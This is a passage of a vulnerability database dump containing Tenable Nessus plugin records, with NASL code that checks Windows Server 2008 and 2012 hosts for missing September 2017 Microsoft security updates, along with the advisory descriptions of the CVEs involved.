script_xref(name:\"MSKB\", value:\"4034786\");\n script_xref(name:\"MSFT\", value:\"MS17-4034786\");\n script_xref(name:\"MSKB\", value:\"4038874\");\n script_xref(name:\"MSFT\", value:\"MS17-4038874\");\n script_xref(name:\"MSKB\", value:\"4039038\");\n script_xref(name:\"MSFT\", value:\"MS17-4039038\");\n script_xref(name:\"MSKB\", value:\"4039266\");\n script_xref(name:\"MSFT\", value:\"MS17-4039266\");\n script_xref(name:\"MSKB\", value:\"4039325\");\n script_xref(name:\"MSFT\", value:\"MS17-4039325\");\n script_xref(name:\"MSKB\", value:\"4039384\");\n script_xref(name:\"MSFT\", value:\"MS17-4039384\");\n\n script_name(english:\"Windows 2008 September 2017 Multiple Security Updates\");\n script_summary(english:\"Checks the existence of Windows Server 2008 September 2017 Patches.\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing multiple security updates released\non 2017/09/12. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. To exploit the vulnerability, an\n attacker on a guest operating system could run a\n specially crafted application that could cause the\n Hyper-V host operating system to disclose memory\n information. An attacker who successfully exploited the\n vulnerability could gain access to information on the\n Hyper-V host operating system. The security update\n addresses the vulnerability by correcting how Hyper-V\n validates guest operating system user input.\n (CVE-2017-8707)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console when it improperly\n parses XML input containing a reference to an external\n entity. An attacker who successfully exploited this\n vulnerability could read arbitrary files via an XML\n external entity (XXE) declaration. To exploit the\n vulnerability, an attacker could create a file\n containing specially crafted XML content and convince an\n authenticated user to open the file. The update\n addresses the vulnerability by modifying the way that\n the Windows System Information Console parses XML input.\n (CVE-2017-8710)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. 
To exploit this\n vulnerability, an attacker would have to log on to an\n affected system and run a specially crafted application.\n The security update addresses the vulnerability by\n correcting how the Windows kernel handles memory\n addresses. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. To exploit this\n vulnerability, an attacker would have to log on to an\n affected system and run a specially crafted application.\n The vulnerability would not allow an attacker to execute\n code or to elevate user rights directly, but it could be\n used to obtain information that could be used to try to\n further compromise the affected system. The update\n addresses the vulnerability by correcting the way in\n which the Windows Graphics Component handles objects in\n memory. (CVE-2017-8683)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. Users whose accounts are\n configured to have fewer user rights on the system could\n be less impacted than users who operate with\n administrative user rights. There are multiple ways an\n attacker could exploit this vulnerability. In a web-\n based attack scenario, an attacker could host a\n specially crafted website that is designed to exploit\n this vulnerability and then convince a user to view the\n website. An attacker would have no way to force users to\n view the attacker-controlled content. 
Instead, an\n attacker would have to convince users to take action,\n typically by getting them to click a link in an email\n message or in an Instant Messenger message that takes\n users to the attacker's website, or by opening an\n attachment sent through email. In a file sharing attack\n scenario, an attacker could provide a specially crafted\n document file that is designed to exploit this\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerabilities by correcting how the Windows font\n library handles embedded fonts. (CVE-2017-8682)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. To exploit the\n vulnerability, a user must open a specially crafted\n file. In an email attack scenario, an attacker could\n exploit the vulnerability by sending the specially\n crafted file to the user and then convincing the user to\n open the file. In a web-based attack scenario, an\n attacker could host a website (or leverage a compromised\n website that accepts or hosts user-provided content)\n that contains a specially crafted file designed to\n exploit the vulnerability. An attacker would have no way\n to force a user to visit the website. 
Instead, an\n attacker would have to convince a user to click a link,\n typically by way of an enticement in an email or Instant\n Messenger message, and then convince the user to open\n the specially crafted file. The security update\n addresses the vulnerability by helping to ensure that\n Windows Shell validates file copy destinations.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. To exploit this vulnerability, an attacker\n would have to log on to an affected system and run a\n specially crafted application. The security update\n addresses the vulnerability by correcting how the\n Windows kernel handles memory addresses. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. 
To exploit this vulnerability, an\n attacker would first have to log on to the system. An\n attacker could then run a specially crafted application\n that could exploit the vulnerability and take control of\n an affected system. The update addresses this\n vulnerability by correcting how Win32k handles objects\n in memory. (CVE-2017-8720)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. To exploit this\n vulnerability, an attacker would have to log on to an\n affected system and run a specially crafted application.\n The vulnerability would not allow an attacker to execute\n code or to elevate user rights directly, but it could be\n used to obtain information that could be used to try to\n further compromise the affected system. The security\n update addresses the vulnerability by correcting how the\n Windows GDI+ component handles objects in memory.\n (CVE-2017-8680, CVE-2017-8681, CVE-2017-8684,\n CVE-2017-8685)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights. There are\n multiple ways an attacker could exploit this\n vulnerability: In a web-based attack scenario, an\n attacker could host a specially crafted website designed\n to exploit this vulnerability and then convince a user\n to view the website. 
An attacker would have no way to\n force users to view the attacker-controlled content.\n Instead, an attacker would have to convince users to\n take action, typically by getting them to click a link\n in an email or instant message that takes users to the\n attacker's website, or by opening an attachment sent\n through email. In a file-sharing attack scenario, an\n attacker could provide a specially crafted document file\n designed to exploit this vulnerability and then convince\n a user to open the document file.The security update\n addresses the vulnerability by correcting how Windows\n Uniscribe handles objects in memory. (CVE-2017-8696)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. To exploit this vulnerability, an\n attacker would have to log on to an affected system and\n run a specially crafted application. The security update\n addresses the vulnerability by correcting how GDI+\n handles memory addresses. (CVE-2017-8688)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. 
The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n To exploit the vulnerability, the attacker needs to be\n within the physical proximity of the targeted user, and\n the user's computer needs to have Bluetooth enabled. The\n attacker can then initiate a Bluetooth connection to the\n target computer without the user's knowledge. The\n security update addresses the vulnerability by\n correcting how Windows handles Bluetooth requests.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. To exploit this vulnerability, an attacker would\n have to log on to an affected system and run a specially\n crafted application. The vulnerability would not allow\n an attacker to execute code or to elevate user rights\n directly, but it could be used to obtain information\n that could be used to try to further compromise the\n affected system. The update addresses the vulnerability\n by correcting how the Windows kernel handles objects in\n memory. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. 
By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. To exploit this vulnerability, an\n attacker would have to log on to an affected system and\n run a specially crafted application. Note that where the\n severity is indicated as Critical in the Affected\n Products table, the Preview Pane is an attack vector for\n this vulnerability. The security update addresses the\n vulnerability by correcting how GDI handles memory\n addresses. (CVE-2017-8676)\");\n # https://support.microsoft.com/en-us/help/4032201/windows-kernel-information-disclosure-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b4cfaff8\");\n # https://support.microsoft.com/en-us/help/4034786/bluetooth-driver-spoofing-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7a43fdc7\");\n # https://support.microsoft.com/en-us/help/4038874/windows-kernel-information-disclosure-vulnerability-in-windows-server\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7c6e0c59\");\n # https://support.microsoft.com/en-us/help/4039038/information-disclosure-vulnerability-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?28782454\");\n # https://support.microsoft.com/en-us/help/4039266/windows-shell-remote-code-execution-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a2d3ffe7\");\n # https://support.microsoft.com/en-us/help/4039325/hyper-v-information-disclosure-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?09206238\");\n # https://support.microsoft.com/en-us/help/4039384/windows-uniscribe-vulnerabilities\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4d820c79\");\n 
script_set_attribute(attribute:\"solution\", value:\n\"Apply the following security updates :\n\n - KB4032201\n - KB4034786\n - KB4038874\n - KB4039038\n - KB4039266\n - KB4039325\n - KB4039384\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-08';\n\nkbs = make_list(\n \"4032201\",\n \"4034786\",\n \"4038874\",\n \"4039038\",\n \"4039266\",\n \"4039325\",\n \"4039384\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KBs only apply to Windows 2008\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif(! 
smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\n# 4032201\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"-usermodensi_31bf3856ad364e35\", file_pat:\"^nsisvc\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19858','6.0.6002.24180'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4032201\", session:the_session);\n\n# 4034786 ; cannot locate on disk yet\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"bthpan.inf_31bf3856ad364e35\", file_pat:\"^bthpan\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19848','6.0.6002.24169'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4034786\", session:the_session);\n\n# 4038874\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"ntdll_31bf3856ad364e35\", file_pat:\"^ntdll\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19623','6.0.6002.24180'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4038874\", session:the_session);\n\n# 4039038\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"m..-management-console_31bf3856ad364e35\", file_pat:\"^mmc\\.exe$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19858', '6.0.6002.24180'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n 
bulletin:bulletin,\n kb:\"4039038\", session:the_session);\n\n# 4039266\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"shell32_31bf3856ad364e35\", file_pat:\"^shell32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19861', '6.0.6002.24182'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4039266\", session:the_session);\n\n# 4039325 ; x64 only ; hyper-v\n#arch = get_kb_item_or_exit('SMB/ARCH');\n#if (arch == \"x64\")\n#{\n# files = list_dir(basedir:winsxs, level:0, dir_pat:\"vstack-vmwp_31bf3856ad364e35\", file_pat:\"^vmwp\\.exe$\", max_recurse:1);\n# vuln += hotfix_check_winsxs(os:'6.0',\n# sp:2,\n# files:files,\n# versions:make_list('6.0.6002.19858', '6.0.6002.24180'),\n# max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n# bulletin:bulletin,\n# kb:\"4039325\", session:the_session);\n#}\n\n# 4039384\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"win32k_31bf3856ad364e35\", file_pat:\"^win32k\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19836', '6.0.6002.24154'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4039384\", session:the_session);\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:59", "description": "The remote Windows host is missing security update 4038786\nor cumulative update 4038799. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. 
(CVE-2017-0161)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. \n (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681,\n CVE-2017-8684)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. 
An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive. To\n exploit the vulnerability, an attacker could send a\n specially crafted packet to a DHCP server. However, the\n DHCP server must be set to failover mode for the attack\n to succeed. The security update addresses the\n vulnerability by correcting how DHCP failover servers\n handle network packets. (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system. To\n exploit the vulnerability, an attacker could issue a\n specially crafted certificate on the guest operating\n system that could cause the VM host agent service on the\n host operating system to execute arbitrary code. The\n Remote Desktop Virtual Host role is not enabled by\n default. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on the host\n operating system. 
The security update addresses the\n vulnerability by correcting how VM host agent service\n validates guest operating system user input.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it. In an\n email attack scenario, an attacker could send an email\n message in an attempt to convince the user to click a\n link to the malicious website. (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
\n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8741)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. 
(CVE-2017-8529)", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-09-12T00:00:00", "title": "Windows Server 2012 September 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8681", "CVE-2017-8713", "CVE-2017-8741", "CVE-2017-8695", "CVE-2017-8682", "CVE-2017-8684", "CVE-2017-0161", "CVE-2017-8719", "CVE-2017-8737", "CVE-2017-8699", "CVE-2017-8749", "CVE-2017-8709", "CVE-2017-8683", "CVE-2017-8680", "CVE-2017-8678", "CVE-2017-8714", "CVE-2017-8728", "CVE-2017-8686", "CVE-2017-8677", "CVE-2017-8747", "CVE-2017-8679", "CVE-2017-8687", "CVE-2017-8759", "CVE-2017-8676", "CVE-2017-8708", "CVE-2017-8688", "CVE-2017-8720", "CVE-2017-8692", "CVE-2017-8529", "CVE-2017-8733", "CVE-2017-8675"], "modified": "2017-09-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038799.NASL", "href": "https://www.tenable.com/plugins/nessus/103132", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103132);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8680\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8684\",\n \"CVE-2017-8686\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8713\",\n \"CVE-2017-8714\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8728\",\n \"CVE-2017-8733\",\n \"CVE-2017-8737\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8749\",\n \"CVE-2017-8759\"\n );\n script_xref(name:\"MSKB\", value:\"4038786\");\n script_xref(name:\"MSFT\", value:\"MS17-4038786\");\n script_xref(name:\"MSKB\", value:\"4038799\");\n script_xref(name:\"MSFT\", value:\"MS17-4038799\");\n\n script_name(english:\"Windows Server 2012 September 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038786\nor cumulative update 4038799. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. 
An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. \n (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681,\n CVE-2017-8684)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. 
